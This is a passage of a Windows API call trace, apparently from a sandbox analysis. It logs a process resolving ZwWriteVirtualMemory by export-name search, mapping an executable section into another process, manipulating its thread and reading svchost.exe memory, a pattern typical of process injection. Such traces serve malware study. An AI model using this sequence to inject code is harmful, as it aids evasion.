lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0076.907] lstrcmpA (lpString1="MD4Final", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="MD4Init", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="MD4Update", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="MD5Final", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="MD5Init", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="MD5Update", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0076.908] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtClose", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwWriteVirtualMemory") returned -1 [0076.909] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwWriteVirtualMemory") returned -1 [0076.910] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwWriteVirtualMemory") returned -1 [0076.910] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwWriteVirtualMemory") returned -1 [0076.910] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.910] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwWriteVirtualMemory") returned -1 [0076.910] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0076.910] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.919] CloseHandle (hObject=0x1e4) returned 1 [0076.919] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.919] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.919] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x5df5a0, ProcessInformationLength=0x30, ReturnLength=0x5df614 | out: ProcessInformation64=0x5df5a0, ReturnLength=0x5df614) returned 0x0 [0076.922] ResumeThread (hThread=0x1d8) returned 0x1 [0076.922] Sleep (dwMilliseconds=0x64) [0077.550] SuspendThread (hThread=0x1d8) returned 0x0 [0077.550] NtGetContextThread (in: ThreadHandle=0x1d8, Context=0x5df660 | out: Context=0x5df660*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x88, [65]=0x86, [66]=0x76, [67]=0xce, [68]=0xfe, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x40, [74]=0x45, [75]=0x73, [76]=0xf6, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x40000000, SegFs=0x73b43440, SegEs=0x7ff6, SegDs=0xda67f978, Edi=0x9e, Esi=0x0, Ebx=0x0, Edx=0x73454000, Ecx=0x7ff6, Eax=0x73454000, Ebp=0x7ff6, Eip=0x73454000, SegCs=0x7ff6, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x40, [45]=0x34, [46]=0xb4, [47]=0x73, [48]=0xf6, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0077.551] NtCreateSection (in: SectionHandle=0x5df5fc, DesiredAccess=0xf001f, ObjectAttributes=0x5df5c0*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x5df5d8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x5df5fc*=0x1e4) returned 0x0 [0077.551] NtMapViewOfSection (in: SectionHandle=0x1e4, ProcessHandle=0xffffffff, BaseAddress=0x5df5e4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x5df590*=0, ViewSize=0x5df598*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x5df5e4*=0x2580000, SectionOffset=0x5df590*=0, ViewSize=0x5df598*=0x133000) returned 0x0 [0077.552] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0077.566] NtMapViewOfSection (in: SectionHandle=0x1e4, ProcessHandle=0x1dc, BaseAddress=0x5df628*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x5df5e0*=0, ViewSize=0x5df5e8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x5df628*=0x5c0000, SectionOffset=0x5df5e0*=0, ViewSize=0x5df5e8*=0x133000) returned 0x0 [0077.567] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0077.568] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0077.568] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0077.568] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x5df4f4, ProcessInformationLength=0x30, ReturnLength=0x5df548 | out: ProcessInformation64=0x5df4f4, ReturnLength=0x5df548) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x73454000, Buffer=0x7ff6, BufferSize=0x21a7c30, NumberOfBytesRead=0x28 | out: Buffer=0x7ff6, NumberOfBytesRead=0x28) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee4c61c0, Buffer=0x7ff8, BufferSize=0x21a7c58, NumberOfBytesRead=0x40 | out: Buffer=0x7ff8, NumberOfBytesRead=0x40) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803510, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803380, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda8039c0, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803ec0, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda805230, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.568] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda8054e0, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.568] VirtualAlloc (lpAddress=0x0, dwSize=0x6c4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0077.569] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0077.569] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0077.569] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x5df4f4, ProcessInformationLength=0x30, ReturnLength=0x5df548 | out: ProcessInformation64=0x5df4f4, ReturnLength=0x5df548) returned 0x0 [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x73454000, Buffer=0x7ff6, BufferSize=0x21a7c30, NumberOfBytesRead=0x28 | out: Buffer=0x7ff6, NumberOfBytesRead=0x28) returned 0x0 [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee4c61c0, Buffer=0x7ff8, BufferSize=0x21a7c58, NumberOfBytesRead=0x40 | out: Buffer=0x7ff8, NumberOfBytesRead=0x40) returned 0x0 [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803510, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803178, Buffer=0x9e, BufferSize=0x21a7a28, NumberOfBytesRead=0x3e | out: Buffer=0x9e, NumberOfBytesRead=0x3e) returned 0x0 [0077.569] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803380, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803270, Buffer=0x9e, BufferSize=0x21a7a28, NumberOfBytesRead=0x3a | out: Buffer=0x9e, NumberOfBytesRead=0x3a) returned 0x0 [0077.569] StrRChrA 